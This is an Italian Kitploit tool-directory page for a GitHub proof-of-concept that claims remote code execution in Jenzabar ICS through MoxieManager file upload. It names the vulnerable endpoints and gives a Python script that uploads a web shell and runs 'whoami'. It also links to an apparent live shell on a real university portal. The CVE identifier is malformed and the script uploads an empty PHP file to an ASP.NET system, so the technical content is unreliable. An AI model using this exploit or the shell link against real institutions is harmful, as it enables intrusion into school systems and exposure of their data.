Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Strumenti/GitHubGitHub/itsismarcos/ics-moxiemanager-fileupload-poc
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebSicurezza WebPenetration TestingSviluppo Payload
GitHubitsismarcos/ics-moxiemanager-fileupload-poc

ICS-MoxieManager-FileUpload-PoC

CVE-2026-30-03 9.8 (Critico) Possibile RCE Jenzabar ICS + MoxieManager

Vedi Repository
14 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

ICS-MoxieManager-RCE-CVE-2026-30-03

CVE-2026-30-03 9.8 (Critico) Possibile RCE Jenzabar ICS + MoxieManager

proff https://www.youtube.com/watch?v=lcfUL6Xx3f4&feature=youtu.be

CVE CVSS Impatto Affetto CVE-2026-30-03 9.8 (Critico) Possibile RCE Jenzabar ICS + MoxieManager

Una vulnerabilità nel componente MoxieManager utilizzato dal sistema Jenzabar ICS può consentire l'invio inadeguato di file che, in determinate condizioni, possono essere accessibili pubblicamente e potenzialmente portare all'esecuzione remota di codice (RCE). Descrizione Tecnica

Il problema si verifica a causa di:

Mancanza di una validazione adeguata dei file inviati

Possibile esposizione dei file tramite endpoint pubblico:

/ICS/staticpages/getfile.aspx

Controllo di autenticazione incoerente sull'endpoint:

/ICS/UI/Common/Scripts/tinymce/plugins/moxiemanager/api.ashx

In scenari specifici, i file inviati possono essere memorizzati in directory accessibili e successivamente recuperati.

Impatto Upload arbitrario di file Esposizione di contenuti sensibili Possibile esecuzione remota di codice (a seconda della configurazione del server) Compromissione totale del sistema

Classificazione CVSS v3.1: 9.8 (Critico) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CWE-434: Upload di file senza restrizioni CWE-284: Controllo di accesso inadeguato

PoC Exploit

#!/usr/bin/env python3

CVE-2026-30-03 PoC - ICS MoxieManager RCE

import requests

TARGET = "https://example.edu" MOXIE = f"{TARGET}/ICS/UI/Common/Scripts/tinymce/plugins/moxiemanager/api.ashx" UUID = "5d6b24cb-7bfe-4a6b-8581-4426bf0f4101"

1. Upload PHP Shell

files = {'file': ('shell.php', '', 'application/x-php')} data = {'action': 'upload', 'path': '/1085255', 'csrf': 'E24607903E4DC7496732F267BAD48FF35D855DA9E362AB80E0340D5B5EC5F164'}

r = requests.post(MOXIE, files=files, data=data) print(f"[+] Upload: {r.status_code}")

2. Execute

SHELL = f"{TARGET}/ICS/staticpages/getfile.aspx?target=/moxiemanager/files/users/{UUID}/shell.php" print(f"[+] Shell: {SHELL}?cmd=whoami") print(requests.get(f"{SHELL}?cmd=whoami").text)

Sistemi Affetti (33+ Confermati)

Rimedio Immediato (Mitigazione):

  1. ELIMINARE /moxiemanager/files/users/*/shell.php

  2. Limitare getfile.aspx:

  3. RewriteRule ^/ICS/staticpages/getfile.aspx?target=.*shell.php - [F,L]

  4. Disabilitare gli upload di MoxieManager

Prof https://my.rsu.edu/ICS/icsfs/shell.asp?target=61d75719-3a6a-4908-bb5d-3f9a443dd443

Scarica lo strumento